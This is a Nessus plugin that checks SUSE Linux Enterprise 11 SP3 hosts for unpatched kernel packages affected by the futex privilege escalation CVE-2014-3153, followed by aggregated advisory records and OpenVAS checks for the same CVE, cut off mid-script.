ID SUSE_11_KERNEL-140604.NASL Type nessus Reporter This script is Copyright (C) 2014-2020 Tenable Network Security, Inc. Modified 2014-06-11T00:00:00
Description
The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix
a critical privilege escalation security issue :
The futex acquisition (requeue) code in kernel/futex.c is reachable by any
local user through the futex syscall and can be abused to gain ring 0
(kernel-mode) execution. An unprivileged, non-root user can therefore use
this flaw to escalate to root or to crash the kernel.
(bnc#880892). (CVE-2014-3153)
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SuSE 11 update information. The text itself is
# copyright (C) Novell, Inc.
#
# Exit silently on NASL interpreters older than level 3000 (see the
# #%NASL_MIN_LEVEL pragma above); nothing is reported for unsupported engines.
if (NASL_LEVEL < 3000) exit(0);
include("compat.inc");
# Plugin registration branch: declares metadata only; no checks run here.
if (description)
{
# Nessus plugin ID and revision of this script.
script_id(74462);
script_version("1.10");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
# The single issue this kernel update addresses: the futex requeue local
# privilege escalation in the Linux kernel.
script_cve_id("CVE-2014-3153");
script_name(english:"SuSE 11.3 Security Update : Linux Kernel (SAT Patch Numbers 9328 / 9329 / 9330)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote SuSE 11 host is missing one or more security updates."
);
# Description text is taken from the SUSE update notice (see file header).
script_set_attribute(
attribute:"description",
value:
"The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix
a critical privilege escalation security issue :
- The futex acquisition code in kernel/futex.c can be used
to gain ring0 access via the futex syscall. This could
be used for privilege escalation by non-root users.
(bnc#880892). (CVE-2014-3153)"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=880892"
);
script_set_attribute(
attribute:"see_also",
value:"http://support.novell.com/security/cve/CVE-2014-3153.html"
);
# Remediation: the SAT patch matching the installed kernel flavour.
# NOTE(review): SUSE's notice for this update also asks for a reboot so the
# patched kernel is actually running; the RPM check below cannot verify that.
script_set_attribute(
attribute:"solution",
value:"Apply SAT patch number 9328 / 9329 / 9330 as appropriate."
);
# CVSS v2: local access, low complexity, no auth, complete C/I/A impact (7.2).
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
# Exploit status: public exploits exist for this CVE, including a Metasploit
# module (the Android "Towelroot" exploit of the same bug) and a CANVAS
# package, and the flag below records that it has been exploited by malware.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Android "Towelroot" Futex Requeue Kernel Exploit');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
# Credentialed (local) check: needs SSH access and the host's RPM list.
script_set_attribute(attribute:"plugin_type", value:"local");
# Affected package CPEs, one per kernel flavour / xen kmp checked below.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-base");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-extra");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-default-man");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-ec2");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-ec2-base");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-ec2-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae-base");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-pae-extra");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-source");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-syms");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-trace");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-trace-base");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-trace-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen-base");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:kernel-xen-extra");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:xen-kmp-default");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");
script_set_attribute(attribute:"patch_publication_date", value:"2014/06/04");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/11");
script_end_attributes();
# Information-gathering plugin: it only inspects KB data collected by
# ssh_get_info.nasl (the dependency declared below).
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
# KB keys that must be populated for the check to run at all.
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# --- Host preconditions --------------------------------------------------
# Each failed precondition terminates the plugin through audit(); the
# order of the checks is kept so the reported reason is unchanged.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

# Must be SLED 11 or SLES 11 (the SP is checked separately below).
suse_release = get_kb_item("Host/SuSE/release");
if (isnull(suse_release) || suse_release !~ "^(SLED|SLES)11") audit(AUDIT_OS_NOT, "SuSE 11");

# rpm_check() works from the package list gathered by ssh_get_info.nasl.
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Only the architectures that appear in the package table are covered.
arch = get_kb_item("Host/cpu");
if (isnull(arch)) audit(AUDIT_UNKNOWN_ARCH);
supported_arch = (arch =~ "^i[3-6]86$") || ("x86_64" >< arch) || ("s390x" >< arch);
if (!supported_arch) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SuSE 11", arch);

# This plugin covers Service Pack 3 only.
patch_level = get_kb_item("Host/SuSE/patchlevel");
if (isnull(patch_level) || int(patch_level) != 3) audit(AUDIT_OS_NOT, "SuSE 11.3");
# --- Package table --------------------------------------------------------
# Reference versions shipped by SAT patches 9328 / 9329 / 9330 for SLE 11 SP3.
# rpm_check() (rpm.inc) compares the installed package of the same name
# against each reference; every match bumps `flag`.
kernel_ver = "3.0.101-0.31.1";
xen_kmp_ver = "4.2.4_02_3.0.101_0.31-0.7.33";

flag = 0;

# SLED 11 SP3 / i586
foreach pkg (make_list(
  "kernel-default", "kernel-default-base", "kernel-default-devel", "kernel-default-extra",
  "kernel-pae", "kernel-pae-base", "kernel-pae-devel", "kernel-pae-extra",
  "kernel-source", "kernel-syms", "kernel-trace-devel",
  "kernel-xen", "kernel-xen-base", "kernel-xen-devel", "kernel-xen-extra"))
{
  if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:pkg + "-" + kernel_ver)) flag++;
}
foreach pkg (make_list("xen-kmp-default", "xen-kmp-pae"))
{
  if (rpm_check(release:"SLED11", sp:3, cpu:"i586", reference:pkg + "-" + xen_kmp_ver)) flag++;
}

# SLED 11 SP3 / x86_64 (no PAE flavour, no xen-kmp-pae)
foreach pkg (make_list(
  "kernel-default", "kernel-default-base", "kernel-default-devel", "kernel-default-extra",
  "kernel-source", "kernel-syms", "kernel-trace-devel",
  "kernel-xen", "kernel-xen-base", "kernel-xen-devel", "kernel-xen-extra"))
{
  if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:pkg + "-" + kernel_ver)) flag++;
}
if (rpm_check(release:"SLED11", sp:3, cpu:"x86_64", reference:"xen-kmp-default-" + xen_kmp_ver)) flag++;

# SLES 11 SP3 / any supported architecture
foreach pkg (make_list(
  "kernel-default", "kernel-default-base", "kernel-default-devel",
  "kernel-source", "kernel-syms",
  "kernel-trace", "kernel-trace-base", "kernel-trace-devel"))
{
  if (rpm_check(release:"SLES11", sp:3, reference:pkg + "-" + kernel_ver)) flag++;
}

# SLES 11 SP3 / i586
foreach pkg (make_list(
  "kernel-ec2", "kernel-ec2-base", "kernel-ec2-devel",
  "kernel-pae", "kernel-pae-base", "kernel-pae-devel",
  "kernel-xen", "kernel-xen-base", "kernel-xen-devel"))
{
  if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:pkg + "-" + kernel_ver)) flag++;
}
foreach pkg (make_list("xen-kmp-default", "xen-kmp-pae"))
{
  if (rpm_check(release:"SLES11", sp:3, cpu:"i586", reference:pkg + "-" + xen_kmp_ver)) flag++;
}

# SLES 11 SP3 / s390x
if (rpm_check(release:"SLES11", sp:3, cpu:"s390x", reference:"kernel-default-man-" + kernel_ver)) flag++;

# SLES 11 SP3 / x86_64
foreach pkg (make_list(
  "kernel-ec2", "kernel-ec2-base", "kernel-ec2-devel",
  "kernel-xen", "kernel-xen-base", "kernel-xen-devel"))
{
  if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:pkg + "-" + kernel_ver)) flag++;
}
if (rpm_check(release:"SLES11", sp:3, cpu:"x86_64", reference:"xen-kmp-default-" + xen_kmp_ver)) flag++;
# --- Reporting ------------------------------------------------------------
# No outdated package matched: the host already carries the fixed RPMs (or
# none of the listed kernel packages at all). audit() ends the plugin here.
if (!flag) audit(AUDIT_HOST_NOT, "affected");

# At least one kernel / xen-kmp RPM is older than the patched reference.
# NOTE(review): this is an installed-package check, not a running-kernel
# check. SUSE's notice for this update asks for a reboot; a host whose RPMs
# were updated but not rebooted is reported as unaffected while the
# vulnerable kernel may still be running.
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
{"cve": [{"lastseen": "2020-12-09T19:58:23", "description": "The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.", "edition": 5, "cvss3": {}, "published": "2014-06-07T14:55:00", "title": "CVE-2014-3153", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3153"], "modified": "2019-04-22T17:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.14.4", "cpe:/o:linux:linux_kernel:3.14", "cpe:/o:linux:linux_kernel:3.14.3", "cpe:/a:redhat:enterprise_mrg:2.0", "cpe:/o:linux:linux_kernel:3.14.2", "cpe:/o:linux:linux_kernel:3.14.1", "cpe:/o:linux:linux_kernel:3.14.5", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2014-3153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3153", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.14:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:-:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.2:*:*:*:*:*:*:*", 
"cpe:2.3:o:linux:linux_kernel:3.14:rc8:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc1:*:*:*:*:*:*", "cpe:2.3:a:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.14:rc2:*:*:*:*:*:*"]}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:44", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "CVE-2014-3153 Futex requeue exploit\n\n# \n\nImportant to Low\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Linux kernel through 3.14.5 \n\n# Description\n\nThe futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification. An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * Cloud Foundry final releases prior to v177 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * Cloud Foundry Runtime Deployments running Release v176 or earlier upgrade to v177 or higher. As of v177, Cloud Foundry is integrated with BOSH stemcell 2671, based on Ubuntu 14.04, which resolves this vulnerability. 
\n\n# Credit\n\nMany thanks to Pinkie Pie, the anonymous researcher who first discovered and reported this issue.\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3153>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>\n * <http://threatpost.com/debian-urging-users-patch-linux-kernel-flaw>\n", "edition": 5, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "CFOUNDRY:CB87545A2D6E3B6DCF68CD117331BD4E", "href": "https://www.cloudfoundry.org/blog/cve-2014-3153/", "title": "CVE-2014-3153 Futex requeue exploit | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "\r\n\r\nHi,\r\n\r\nThis was handled via linux-distros, hence the mandatory oss-security\r\nposting. The issue was made public earlier today, and is included in\r\nthis Debian advisory:\r\n\r\nhttps://lists.debian.org/debian-security-announce/2014/msg00130.html\r\n\r\n---\r\nCVE-2014-3153\r\n\r\n Pinkie Pie discovered an issue in the futex subsystem that allows a\r\n local user to gain ring 0 control via the futex syscall. An\r\n unprivileged user could use this flaw to crash the kernel (resulting\r\n in denial of service) or for privilege escalation.\r\n---\r\n\r\nI've attached patches by Thomas Gleixner (four e-mails, in mbox format),\r\nas well as back-ports of those by John Johansen of Canonical, who wrote:\r\n\r\n---\r\nFor anyone who is interested I've attached back ports of the patches to\r\n\r\n 3.13 - minor conflicts in patch 4. 
It has applied cleanly back to 3.2\r\nand\r\n 2.6.32 - conflict is in patches 3, and 4\r\n---\r\n\r\nAlexander\r\n\r\n", "edition": 1, "modified": "2014-06-09T00:00:00", "published": "2014-06-09T00:00:00", "id": "SECURITYVULNS:DOC:30788", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30788", "title": "[oss-security] Linux kernel futex local privilege escalation (CVE-2014-3153)", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-3153"], "description": "ring 0 code execution via futex syscall.", "edition": 1, "modified": "2014-06-09T00:00:00", "published": "2014-06-09T00:00:00", "id": "SECURITYVULNS:VULN:13812", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13812", "title": "Linux privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-31T18:37:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850794", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850794", "type": "openvas", "title": "SUSE: Security Advisory for Linux (SUSE-SU-2014:0775-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850794\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Linux (SUSE-SU-2014:0775-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Linux'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix a\n critical privilege escalation security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. 
(bnc#880892)\n\n Indications:\n\n Everyone using the Linux Kernel on x86_64 architecture should update.\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\");\n\n script_tag(name:\"affected\", value:\"Linux on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0775-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.2.4_02_3.0.101_0.31~0.7.33\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ppc64-base\", rpm:\"kernel-ppc64-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ppc64-devel\", rpm:\"kernel-ppc64-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.0.101~0.31.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.2.4_02_3.0.101_0.31~0.7.33\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310850859", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850859", "type": "openvas", "title": "SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-2)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850859\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:22:14 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-2)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Linux'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. 
(bnc#880892)\n\n Indications:\n\n Everyone using the Linux Kernel on s390x architecture should update.\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\");\n\n script_tag(name:\"affected\", value:\"Linux on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0837-2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = 